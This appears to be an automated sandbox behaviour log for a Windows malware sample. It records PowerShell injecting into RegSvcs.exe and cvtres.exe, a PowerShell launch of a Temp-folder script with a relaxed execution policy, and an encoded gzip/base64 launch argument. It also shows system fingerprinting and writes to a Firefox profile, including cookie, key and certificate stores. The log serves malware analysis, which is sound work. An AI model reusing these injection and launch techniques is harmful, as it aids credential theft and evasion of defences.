Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 45C000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 45E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 94E008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 510000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 512000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: BE2008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe H4sIAAAAAAAEAD3Mz0rDMBwAYMoUoSroG4QdBX/mb013S7vKLg6pE0EjWNfMBW0DSbaJR9/JB/A1BMFH0YN4/Q7f8DtJv5L0M0kRoeWYlJIrSYQiTNGMq0JKIfBpxlmFhwfXtm/dJqCxWZi+Nf7oXwhGGS9spNscCMjRvmo729sQfROdLw6Xqwfj4+3kqqjq2fFFeTf5eB/UezkFKgRIAYzfDKYn6n7L7/zuzeo5vublSP/9+tzOvQtuEWFazfSZbzqzcf5JrzlgYJiRXNfm8XI9D2BezFuyi1uElwh3CIcfg6vl8uMAAAA=	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe h4siaaaaaaaead3mz0rdmbwaymouosrog4qdbx/mb013s7vklg6pe0ejwnfmbw0dsbajr9/jb/a1bmfh0yn4/q7f8dtjv5l0m0kroewyljirsyqitngmq0jkifbpxlmfhwfxtm/djqcxwzi+nf7oxwhggs9spnsccmjrvmo729sqfrodlw6xqwfj4+3kqqjq2fffetf5eb/uezkfkgriayzfdkyn6n7l7/zuzeo5vublsp/9+tzovqtuewfazfszbzqzcf5jrzlgyjirxnfm8xi9d2bezfuyi1uelwh3cicfg6vl8umaaaa=
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe h4siaaaaaaaead3mz0rdmbwaymouosrog4qdbx/mb013s7vklg6pe0ejwnfmbw0dsbajr9/jb/a1bmfh0yn4/q7f8dtjv5l0m0kroewyljirsyqitngmq0jkifbpxlmfhwfxtm/djqcxwzi+nf7oxwhggs9spnsccmjrvmo729sqfrodlw6xqwfj4+3kqqjq2fffetf5eb/uezkfkgriayzfdkyn6n7l7/zuzeo5vublsp/9+tzovqtuewfazfszbzqzcf5jrzlgyjirxnfm8xi9d2bezfuyi1uelwh3cicfg6vl8umaaaa=			Jump to behavior

Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3946822654.0000000002D14000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3946822654.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4078864153.00000000060D3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3946822654.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: explorer.exe, 0000000F.00000002.3925351931.0000000000B17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Progman
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh{
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3946822654.0000000002D14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0042A4DF cpuid

3_2_0042A4DF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,	3_2_00442171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: EnumSystemLocalesW,	3_2_00442263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: EnumSystemLocalesW,	3_2_00442218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: EnumSystemLocalesW,	3_2_004422FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: EnumSystemLocalesW,	3_2_0043830C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00442389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,	3_2_004425DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00442702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,	3_2_00442808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetLocaleInfoW,	3_2_0043882E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_004428D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_00441F76

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000090101\34.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000090101\34.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000100141\34.ps1 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0042A705 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_0042A705

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

3_2_004061F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0043E7DE _free,_free,_free,GetTimeZoneInformation,_free,

3_2_0043E7DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004093D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

3_2_004093D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Overwrites Mozilla Firefox settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\addons.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\favicons.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\sessionstore.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\addonStartup.json.lz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\shield-preference-experiments.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\handlers.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\AlternateServices.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\targeting.snapshot.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\times.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\webappsstore.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\ExperimentStoreData.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\extension-preferences.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\permissions.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\compatibility.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\containers.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\favicons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\pkcs11.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\xulstore.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\protections.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\search.json.mozlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\sessionstore-backups\previous.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\008ede48-c825-4f89-a2a2-325df2c42c07	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\sessionstore-backups\upgrade.jsonlz4-20230927232528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\state.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493966540.1912e5a9-a49a-44a5-95c6-6e047a7410c8.new-profile.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\b5870d07-97bf-4bf9-a21f-d4715e2d8984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\a2d29e6c-ac08-481c-a5a2-3b45379df53a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\db\data.safe.bin	Jump to behavior
